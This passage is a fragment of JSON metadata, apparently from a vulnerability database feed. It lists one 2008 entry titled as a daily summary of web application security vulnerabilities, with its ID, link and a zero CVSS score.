"2008-02-01T00:00:00", "id": "SECURITYVULNS:VULN:8626", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8626", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}